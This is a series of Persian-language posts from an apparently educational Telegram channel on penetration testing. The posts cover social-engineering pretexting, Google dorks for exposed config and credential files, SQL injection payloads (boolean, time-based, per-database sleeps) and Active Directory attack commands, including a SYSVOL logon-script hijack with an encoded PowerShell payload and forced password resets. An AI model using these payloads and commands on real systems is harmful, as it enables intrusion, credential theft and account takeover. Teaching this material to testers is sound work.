🔥دستور تک خطی برای دانلود تمام
@TryHackBox
@assetnote ورد لیست:wget -r --no-parent -R "index.html*" wordlists-cdn.assetnote.io/data/ -nH -e robots=off
@TryHackBox
❤8👍1
📝مهندسی اجتماعی دروغپردازی سازمانیافته
؛🔰Pretexting – ایجاد موقعیت با داستان ساختگی
؛🔸Pretexting عبارت است از ساختن سناریویی قانعکننده برای فریب قربانی.
🔸هکر ادعا میکند که نقش فرد معتبری را بر عهده دارد (مثلاً مدیر منابع انسانی، مأمور پلیس یا کارمند فناوری اطلاعات).
🔻هدف:
🔹کسب اعتماد و استخراج اطلاعات حساس مانند رمز عبور، شماره ملی، فایلها یا دسترسیها.
🔻به عنوان نمونه ممکن است اینگونه ارتباط بگیرد:
🔹«سلام، من از تیم پشتیبانی هستم. باید به لپتاپ شما دسترسی داشته باشم؛ زیرا بدافزاری شناسایی شده است…»
🔻ترفند مورد استفاده مهندس اجتماعی:
🔹استفاده از اطلاعات عمومی شما در شبکههای اجتماعی (لینکدین، اینستاگرام) برای ساخت داستانی مستدل.
🚨نکته امنیتی:
هرگز بدون تأیید رسمی یا از طریق کانالهای مطمئن، اطلاعات یا دسترسی در اختیار این افراد قرار ندهید.
#مهندسی_اجتماعی
@TryHackBox
؛🔰Pretexting – ایجاد موقعیت با داستان ساختگی
؛🔸Pretexting عبارت است از ساختن سناریویی قانعکننده برای فریب قربانی.
🔸هکر ادعا میکند که نقش فرد معتبری را بر عهده دارد (مثلاً مدیر منابع انسانی، مأمور پلیس یا کارمند فناوری اطلاعات).
🔻هدف:
🔹کسب اعتماد و استخراج اطلاعات حساس مانند رمز عبور، شماره ملی، فایلها یا دسترسیها.
🔻به عنوان نمونه ممکن است اینگونه ارتباط بگیرد:
🔹«سلام، من از تیم پشتیبانی هستم. باید به لپتاپ شما دسترسی داشته باشم؛ زیرا بدافزاری شناسایی شده است…»
🔻ترفند مورد استفاده مهندس اجتماعی:
🔹استفاده از اطلاعات عمومی شما در شبکههای اجتماعی (لینکدین، اینستاگرام) برای ساخت داستانی مستدل.
🚨نکته امنیتی:
هرگز بدون تأیید رسمی یا از طریق کانالهای مطمئن، اطلاعات یا دسترسی در اختیار این افراد قرار ندهید.
#مهندسی_اجتماعی
@TryHackBox
❤4
P.F.K Security
BurpSuite pro v2025.10.4.zip
⚠️ هشدار امنیتی برای مبتدیان در حوزه امنیت سایبری
💡به عنوان یک نکته مهم برای تازهکاران در زمینه امنیت سایبری، توصیه میشود که ابزارهای نرمافزاری نسخهکرکشده (مانند فایلهای تلگرامی یا ابزارهایی نظیر Cobalt و مشابه آنها) را هرگز روی سیستمهای اصلی و شخصی خود اجرا نکنید. این ابزارها اغلب حاوی بدافزارهای پنهان یا آسیبپذیریهای امنیتی هستند که میتوانند به سرقت اطلاعات، آلودگی سیستم یا حتی دسترسی غیرمجاز هکرها منجر شوند. برای حفظ امنیت، از نسخههای رسمی و معتبر ابزارها استفاده کنید و در محیطهای ایزوله مانند ماشینهای مجازی (Virtual Machines) آزمایشهای خود را انجام دهید.
📌 توصیههای عملی
⦁ استفاده از محیط تست: همیشه ابزارهای مشکوک را در یک ماشین مجازی (مانند VirtualBox یا VMware) اجرا کنید تا از تأثیر بر سیستم اصلی جلوگیری شود.
@TryHackBox
💡به عنوان یک نکته مهم برای تازهکاران در زمینه امنیت سایبری، توصیه میشود که ابزارهای نرمافزاری نسخهکرکشده (مانند فایلهای تلگرامی یا ابزارهایی نظیر Cobalt و مشابه آنها) را هرگز روی سیستمهای اصلی و شخصی خود اجرا نکنید. این ابزارها اغلب حاوی بدافزارهای پنهان یا آسیبپذیریهای امنیتی هستند که میتوانند به سرقت اطلاعات، آلودگی سیستم یا حتی دسترسی غیرمجاز هکرها منجر شوند. برای حفظ امنیت، از نسخههای رسمی و معتبر ابزارها استفاده کنید و در محیطهای ایزوله مانند ماشینهای مجازی (Virtual Machines) آزمایشهای خود را انجام دهید.
📌 توصیههای عملی
⦁ استفاده از محیط تست: همیشه ابزارهای مشکوک را در یک ماشین مجازی (مانند VirtualBox یا VMware) اجرا کنید تا از تأثیر بر سیستم اصلی جلوگیری شود.
@TryHackBox
❤9👍5
🔥 گوگل دورک - XSS Prone Parameters
@TryHackBox
#دورک #گوگل_دورک #Dork
site:example[.]com inurl:q= | inurl:s= | inurl:search= | inurl:query= | inurl:keyword= | inurl:lang= inurl:&@TryHackBox
#دورک #گوگل_دورک #Dork
❤4
⭕️ دیگر کانال ها و شبکه های اجتماعی ما را دنبال کنید :
💠 کانال های تلگرام ما :
🔶 آموزش تست نفوذ و Red Team
🆔 @TryHackBox
🔶 رودمپ های مختلف
🆔 @TryHackBoxOfficial
🔶 داستان های هک
🆔 @TryHackBoxStory
🔶 آموزش برنامه نویسی
🆔 @TryCodeBox
🔶 رادیو زیروپاد ( پادکست ها )
🆔 @RadioZeroPod
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
👥 گروه های پرسش و پاسخ
🔷 هک و امنیت
🆔 @TryHackBoxGroup
🔷 برنامه نویسی
🆔 @TryCodeBoxGroup
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
🔴 اینستاگرام :
🔗 http://www.instagram.com/TryHackBox
🔵 یوتیوب :
🔗 https://youtube.com/@tryhackbox
🟠 گیت هاب ما :
🔗 https://github.com/TryHackBox/
🟣 لینکدین ما :
🔗 https://www.linkedin.com/company/tryhackbox-org
💠 کانال های تلگرام ما :
🔶 آموزش تست نفوذ و Red Team
🆔 @TryHackBox
🔶 رودمپ های مختلف
🆔 @TryHackBoxOfficial
🔶 داستان های هک
🆔 @TryHackBoxStory
🔶 آموزش برنامه نویسی
🆔 @TryCodeBox
🔶 رادیو زیروپاد ( پادکست ها )
🆔 @RadioZeroPod
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
👥 گروه های پرسش و پاسخ
🔷 هک و امنیت
🆔 @TryHackBoxGroup
🔷 برنامه نویسی
🆔 @TryCodeBoxGroup
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
🔴 اینستاگرام :
🔗 http://www.instagram.com/TryHackBox
🔵 یوتیوب :
🔗 https://youtube.com/@tryhackbox
🟠 گیت هاب ما :
🔗 https://github.com/TryHackBox/
🟣 لینکدین ما :
🔗 https://www.linkedin.com/company/tryhackbox-org
❤1
#مهندسی_اجتماعی
تو جای هکر بودی، چه داستانی می ساختی؟
سناریو
فرض کن شما کارمند یک سازمان متوسط هستید.
این پیام را در واتساپ کاری دریافت میکنید:
«سلام، من موسوی از واحد فناوری اطلاعات هستم.
طبق بررسی لاگها، سیستم شما به یک IP خارجی متصل شده.
برای جلوگیری از نشت اطلاعات، باید هویت شما تأیید شود.»
❓ سؤال:
آیا این پیام میتواند یک حمله Pretexting باشد؟
کدام بخش پیام اعتمادسازی است؟
کدام بخش ایجاد ترس یا فوریت میکند؟
چه اطلاعاتی عمداً مبهم گفته شده؟
@TryHackBox
تو جای هکر بودی، چه داستانی می ساختی؟
سناریو
فرض کن شما کارمند یک سازمان متوسط هستید.
این پیام را در واتساپ کاری دریافت میکنید:
«سلام، من موسوی از واحد فناوری اطلاعات هستم.
طبق بررسی لاگها، سیستم شما به یک IP خارجی متصل شده.
برای جلوگیری از نشت اطلاعات، باید هویت شما تأیید شود.»
❓ سؤال:
آیا این پیام میتواند یک حمله Pretexting باشد؟
کدام بخش پیام اعتمادسازی است؟
کدام بخش ایجاد ترس یا فوریت میکند؟
چه اطلاعاتی عمداً مبهم گفته شده؟
@TryHackBox
❤4
🔥گوگل دورک - Exposed Configs 🔍
#دورک #گوگل_دورک #Dork
site:example[.]com ext:log | ext:txt | ext:conf | ext:cnf | ext:ini | ext:env | ext:sh | ext:bak | ext:backup | ext:swp | ext:old | ext:~ | ext:git | ext:svn | ext:htpasswd | ext:htaccess | ext:json
@TryHackBox #دورک #گوگل_دورک #Dork
❤7🔥1
🎞 مینی دوره #رایگان راهنمای عملی تست نفوذ | قسمت اول مبانی شبکه برای پنتسترها | وایرشارک | WireShark
🔖 راهنمای تست نفوذ یک پلیلیست آموزشی برای یادگیری عملی تست نفوذ است که مفاهیم شبکه، تحلیل ترافیک و شناسایی زیرساخت را بهصورت گامبهگام پوشش میدهد.
🔗 https://youtu.be/G68HYbx9_6o
🆔️ @TryHackBox
🆔️ @TryHackBoxOfficial
🆔️ @TryHackBoxStory
🆔️ @RadioZeroPod
🔖 راهنمای تست نفوذ یک پلیلیست آموزشی برای یادگیری عملی تست نفوذ است که مفاهیم شبکه، تحلیل ترافیک و شناسایی زیرساخت را بهصورت گامبهگام پوشش میدهد.
🔗 https://youtu.be/G68HYbx9_6o
انتقادی داشتید حتما اطلاع بدید، تا بتونیم آموزش با کیفیتتری ارائه بدیم، امیدواریم از آموزش لذت ببرید :)
🆔️ @TryHackBox
🆔️ @TryHackBoxOfficial
🆔️ @TryHackBoxStory
🆔️ @RadioZeroPod
👏8
🔖 بررسی SQL Injection (SQLi) : Blind, Time-Based, Error-Based - بخش اول
🔐 SQL Injection چیست؟
تزریق SQL (SQL Injection) یکی از رایجترین و خطرناکترین آسیبپذیریهای امنیتی است که زمانی رخ میدهد که ورودی کنترلنشدهٔ کاربر مستقیماً داخل یک کوئری SQL قرار بگیرد.
در این حالت، مهاجم میتواند منطق کوئری را تغییر دهد و به دادهها دسترسی غیرمجاز پیدا کند، آنها را تغییر دهد یا حتی حذف کند.
در سناریوهای شدیدتر، SQLi میتواند به اجرای دستورات در سطح سیستمعامل سرور منجر شود.
🧨 انواع SQL Injection
📍 SQL Injection کجا اتفاق میافتد؟
ا SQLi میتواند در هر نقطهای رخ دهد که اپلیکیشن بر اساس ورودی کاربر به دیتابیس کوئری میزند، از جمله:
🕵️ شناسایی SQL Injection
تستهای ساده اولیه:
تستهای پیشرفتهتر (Time‑Based):
تستهای منطقی (Boolean‑Based):
در سناریوهای Blind باید به این نشانهها توجه کرد:
🗄 شناسایی نوع پایگاه داده (Database Engine)
تشخیص دیتابیس بکاند برای طراحی Payload دقیقتر حیاتی است:
MySQL
PostgreSQL
MSSQL
Oracle
#باگ_بانتی
🆔 @TryHackBox
🆔 @TryHackBoxOfficial
🆔 @TryHackBoxStory
🆔 @RadioZeroPod
🔐 SQL Injection چیست؟
تزریق SQL (SQL Injection) یکی از رایجترین و خطرناکترین آسیبپذیریهای امنیتی است که زمانی رخ میدهد که ورودی کنترلنشدهٔ کاربر مستقیماً داخل یک کوئری SQL قرار بگیرد.
در این حالت، مهاجم میتواند منطق کوئری را تغییر دهد و به دادهها دسترسی غیرمجاز پیدا کند، آنها را تغییر دهد یا حتی حذف کند.
در سناریوهای شدیدتر، SQLi میتواند به اجرای دستورات در سطح سیستمعامل سرور منجر شود.
🧨 انواع SQL Injection
1. Classic / Error‑Based SQLi
استفاده از پیامهای خطای SQL که با جزئیات نمایش داده میشوند برای استخراج ساختار دیتابیس (جداول، ستونها و …).
2. Blind SQLi
هیچ خروجی یا خطای مستقیمی وجود ندارد؛ مهاجم نتیجهٔ کوئری را از طریق رفتار برنامه (True / False) استنتاج میکند.
3. Time‑Based Blind SQLi
مبتنی بر ایجاد تأخیر زمانی (مثل SLEEP() یا WAITFOR) برای تشخیص درست یا نادرست بودن شرطها.
4. Out‑of‑Band SQLi
استفاده از کانالهای ارتباطی جانبی مثل DNS یا HTTP Callback برای دریافت داده؛ زمانی کاربرد دارد که نه خروجی وجود دارد و نه تفاوت زمانی قابل تشخیص.
5. Second‑Order SQLi
ورودی مخرب ابتدا در دیتابیس ذخیره میشود و در مرحلهای دیگر (مثلاً هنگام پردازش بعدی) باعث اجرای تزریق SQL میگردد.
📍 SQL Injection کجا اتفاق میافتد؟
ا SQLi میتواند در هر نقطهای رخ دهد که اپلیکیشن بر اساس ورودی کاربر به دیتابیس کوئری میزند، از جمله:
💠فرمهای لاگین
💠 فیلدهای جستجو
💠فیلترها (دستهبندی، تاریخ و …)
💠پارامترهای GET و POST
💠فیلدهای مخفی (Hidden Fields)
💠هدرهای HTTP (User‑Agent، Referer و …)
💠کوکیها
🕵️ شناسایی SQL Injection
تستهای ساده اولیه:
' OR '1'='1
' OR 1=1 --
تستهای پیشرفتهتر (Time‑Based):
' AND SLEEP(5) --
' AND (SELECT 1 FROM dual WHERE SLEEP(5)) --
تستهای منطقی (Boolean‑Based):
' AND 1=1 -- → رفتار عادی
' AND 1=2 -- → رفتار متفاوت
در سناریوهای Blind باید به این نشانهها توجه کرد:
💠 تأخیر زمانی
💠 تفاوت در محتوای صفحه
💠 تغییر HTTP Status Code
💠 تغییر الگوی درخواستهای شبکه
🗄 شناسایی نوع پایگاه داده (Database Engine)
تشخیص دیتابیس بکاند برای طراحی Payload دقیقتر حیاتی است:
MySQL
SELECT version();
SLEEP(5)
PostgreSQL
SELECT current_database();
pg_sleep(5)
MSSQL
SELECT @@version;
WAITFOR DELAY '00:00:05'
Oracle
SELECT banner FROM v$version;
DBMS_LOCK.SLEEP(5)
🔍 شما تا حالا با کدام نوع SQL Injection در پروژه یا تست نفوذ واقعی برخورد داشتهاید؟ تجربتون را در کامنتها به اشتراک بگذارید.
#باگ_بانتی
🆔 @TryHackBox
🆔 @TryHackBoxOfficial
🆔 @TryHackBoxStory
🆔 @RadioZeroPod
👏7
Forwarded from رادیو زیرو پاد
📌 برگزاری جلسه ویس چت : مهندس مهرشاد علیزاده
با درود خدمت دوستان و همراهان عزیز،
در راستای ارتقای سطح دانش فنی و آشنایی بیشتر با مباحث امنیت سایبری، قصد داریم جلسهای تخصصی و آموزشی در خصوص واقعیت های باگ بانتی در ایران از جذابیت تا سختی هایی که این حوزه دارد به صورت ویس چت برگزار کنیم.
🎙 مهمان ویژه:
مهندس مهرشاد علیزاده
📅 زمان برگزاری: پنجشنبه 1404/10/11
📍 پلتفرم: تلگرام (ویس چت)
🕗 ساعت : 19:00
🔖 لینک جلسه :
🎙 قسمت اول
⁉️ موضوعات ما :
📖 قسمت اول تعریف واقع بینانه باگ بانتی در ایران
💬 سوالات خود را درباره باگ بانتی در ایران در کامنتهاارسال کنید تا در جلسه به آنها پرداخته شود.
🔔 نکته مهم:
جهت شرکت به موقع جلسه، حتماً کانال تلگرام را چک کنید تا از این جلسه جا نمونید .
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
🆔 @RadioZeroPod
🆔 @TryHackBox
با درود خدمت دوستان و همراهان عزیز،
در راستای ارتقای سطح دانش فنی و آشنایی بیشتر با مباحث امنیت سایبری، قصد داریم جلسهای تخصصی و آموزشی در خصوص واقعیت های باگ بانتی در ایران از جذابیت تا سختی هایی که این حوزه دارد به صورت ویس چت برگزار کنیم.
🎙 مهمان ویژه:
مهندس مهرشاد علیزاده
📅 زمان برگزاری: پنجشنبه 1404/10/11
📍 پلتفرم: تلگرام (ویس چت)
🕗 ساعت : 19:00
🔖 لینک جلسه :
🎙 قسمت اول
⁉️ موضوعات ما :
📖 قسمت اول تعریف واقع بینانه باگ بانتی در ایران
💬 سوالات خود را درباره باگ بانتی در ایران در کامنتهاارسال کنید تا در جلسه به آنها پرداخته شود.
🔔 نکته مهم:
جهت شرکت به موقع جلسه، حتماً کانال تلگرام را چک کنید تا از این جلسه جا نمونید .
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
🆔 @RadioZeroPod
🆔 @TryHackBox
❤3🤔1
💢 یک بکدور مخفی در نسخه PHP وجود داشت که اجازه اجرای کد از راه دور را در هدر user-agent میداد.
@TryHackBox
#backdoor #بکدور #درب_پشتی
✍ حدس بزنید دوستان، این نسخه کدام است؟
@TryHackBox
#backdoor #بکدور #درب_پشتی
Forwarded from
تست نفوذ Active Directory - بخش سوم
آپلود دادههای جمعآوریشده
پس از اجرا، فایلهای نتیجه با پسوند (*.json) در دایرکتوری فعلی تولید میشوند. تمام این فایلهای JSON را در BloodHound داخل مرورگر وب آپلود کنید.
میتوانیم روابط موجود در Active Directory را بررسی کنیم.
بررسی Investigation
سوءاستفاده از اسکریپت لاگین برای کاربران دیگر
اگر کاربر فعلی مجوز نوشتن اسکریپتها در SYSVOL را داشته باشد، ممکن است بتوانیم مسیر اسکریپت لاگین سایر کاربران را تغییر دهیم.
وقتی کاربر دیگر وارد سیستم شود (Log on)، فایل .bat اجرا خواهد شد.
Force Change Password Attack
اگر به نام کاربری/رمز عبور یک حساب دسترسی پیدا کنیم و نام کاربری حسابهای دیگر را هم بدانیم، ممکن است بتوانیم رمز عبور کاربران دیگر را تغییر دهیم. برای انجام این کار، کاربر باید مجوز GenericAll را برای تغییر رمز عبور سایر کاربران داشته باشد.
توضیح پارامترها:
این دستور رمز عبور کاربر تارگت را با استفاده از دسترسی کاربری که مجوز لازم را دارد، بهصورت اجباری تغییر میدهد.
Microsoft Management Console (mmc)
برای راهاندازی و پیکربندی Active Directory، مراحل زیر را دنبال کنید:
#AD
@KavehOffSec
آپلود دادههای جمعآوریشده
پس از اجرا، فایلهای نتیجه با پسوند (*.json) در دایرکتوری فعلی تولید میشوند. تمام این فایلهای JSON را در BloodHound داخل مرورگر وب آپلود کنید.
میتوانیم روابط موجود در Active Directory را بررسی کنیم.
بررسی Investigation
# فهرست تمام کاربران
net user /domain
net user <username> /domain
Get-ADUser -Filter *
Get-ADUser -Identity <username> -Server dc.example.com -Properties *
Get-ADUser -Filter 'Name -like "*michael"' -Server dc.example.com | Format-Table Name,SamAccountName -A
# فهرست تمام گروهها
net group /domain
net group "<group>" /domain
PS> Get-ADGroup -Identity <group> -Server dc.example.com -Properties *
PS> Get-ADGroupMember -Identity <group> -Server dc.example.com
# نمایش سیاست رمز عبور
net accounts /domain
# لیست Object Active Directory
$ChangeDate = New-Object DateTime(2022, 02, 28, 12, 00, 00)
Get-ADObject -Filter 'whenChanged -gt $ChangeDate' -includeDeletedObjects -Server dc.example.com
# دریافت اطلاعات مربوط به دامنه مشخصشده
Get-ADDomain -Server dc.example.com
# تغییر رمز عبور کاربر Active Directory
Set-ADAccountPassword -Identity <username> -Server dc.example.com -OldPassword (ConvertTo-SecureString -AsPlaintext "oldpass" -force) -NewPassword (ConvertTo-SecureString -AsPlaintext "newpass" -force)
# SYSVOL - یک پوشه اشتراکی که Group Policy Objects (GPOs) را ذخیره میکند.
dir \\dc.example.com\SYSVOL\
سوءاستفاده از اسکریپت لاگین برای کاربران دیگر
اگر کاربر فعلی مجوز نوشتن اسکریپتها در SYSVOL را داشته باشد، ممکن است بتوانیم مسیر اسکریپت لاگین سایر کاربران را تغییر دهیم.
# 1. Check the permission
icacls C:\Windows\SYSVOL\sysvol\example.local\noscripts\
# 2. Modify/Add a malicious noscript
'powershell -e <BASE64_COMMAND>' | OutFile -FilePath C:\Windows\SYSVOL\sysvol\example.local\noscripts\evil.bat
# 3. Set logon noscript for the specified user
Set-ADUser -Identity VictimUser -ScriptPath '\\example.local\SYSVOL\example.local\noscripts\evil.bat
وقتی کاربر دیگر وارد سیستم شود (Log on)، فایل .bat اجرا خواهد شد.
Force Change Password Attack
اگر به نام کاربری/رمز عبور یک حساب دسترسی پیدا کنیم و نام کاربری حسابهای دیگر را هم بدانیم، ممکن است بتوانیم رمز عبور کاربران دیگر را تغییر دهیم. برای انجام این کار، کاربر باید مجوز GenericAll را برای تغییر رمز عبور سایر کاربران داشته باشد.
توضیح پارامترها:
-U:
اعتبارنامه کاربری که مجوز تغییر رمز عبور کاربر دیگر را دارد
-I:
آدرس IP تارگت
-S:
نام سرور تارگت
net rpc password "TargetUserName" "myPassw0rd@123" -U "UserName"%"Password" -I "10.0.0.1" -S "EXAMPLE.LOCAL"
این دستور رمز عبور کاربر تارگت را با استفاده از دسترسی کاربری که مجوز لازم را دارد، بهصورت اجباری تغییر میدهد.
Microsoft Management Console (mmc)
برای راهاندازی و پیکربندی Active Directory، مراحل زیر را دنبال کنید:
روی آیکون ویندوز راستکلیک کنید.
روی Run کلیک کرده و عبارت mmc را وارد کنید، سپس OK را بزنید.
در پنجره MMC، روی File → Add or Remove Snap-ins کلیک کنید.
هر سه Snap-in مربوط به Active Directory را اضافه کنید.
در پنل سمت چپ، روی Active Directory… راستکلیک کرده و گزینه Change Forest را انتخاب کنید.
نام دامنه را بهعنوان Root domain وارد کرده و روی OK کلیک کنید.
از منوی بالا روی View → Advanced Features کلیک کنید.
#AD
@KavehOffSec
❤1